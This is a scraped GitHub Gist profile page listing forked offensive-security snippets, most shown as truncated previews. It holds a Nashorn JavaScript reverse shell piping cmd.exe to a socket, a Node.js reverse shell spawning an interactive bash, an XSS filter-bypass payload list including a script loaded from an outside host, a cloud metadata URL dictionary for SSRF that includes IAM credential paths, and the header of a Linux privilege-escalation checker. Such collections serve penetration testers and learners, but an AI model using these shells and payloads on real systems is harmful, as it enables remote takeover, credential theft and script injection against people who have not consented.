Skip to content

Instantly share code, notes, and snippets.

fuckup fuckup1337

Block or report user

Report or block fuckup1337

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@fuckup1337
fuckup1337 / parse_austria.php
Created Feb 9, 2019 — forked from chrisiaut/parse_austria.php
Parsing ip data from a file
View parse_austria.php
<?php
$infile = 'austria.csv';
$outfile = 'austria.ips';
$fp = fopen($outfile,'w');
$handle = fopen($infile, "r");
if ($handle)
{
while (($line = fgets($handle)) !== false) {
$line = trim($line);
@fuckup1337
fuckup1337 / cloud_metadata.txt
Created May 30, 2018 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
View cloud_metadata.txt
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@fuckup1337
fuckup1337 / linuxprivchecker.py
Created May 23, 2018 — forked from sh1n0b1/linuxprivchecker.py
linuxprivchecker.py -- a Linux Privilege Escalation Check Script
View linuxprivchecker.py
#!/usr/env python
###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.
@fuckup1337
fuckup1337 / revsh.js
Created May 17, 2018 — forked from frohoff/revsh.js
Nashorn Javascript Reverse Shell
View revsh.js
var host="localhost";
var port=8044;
var cmd="cmd.exe";
var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();
View reverse_shell.js
var spawn = require('child_process').spawn;
var net = require('net');
var reconnect = require('reconnect');
reconnect(function (stream) {
var ps = spawn('bash', [ '-i' ]);
stream.pipe(ps.stdin);
ps.stdout.pipe(stream, { end: false });
ps.stderr.pipe(stream, { end: false });
ps.on('exit', function () { stream.end() });
View xxsfilterbypass.lst
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
You can’t perform that action at this time.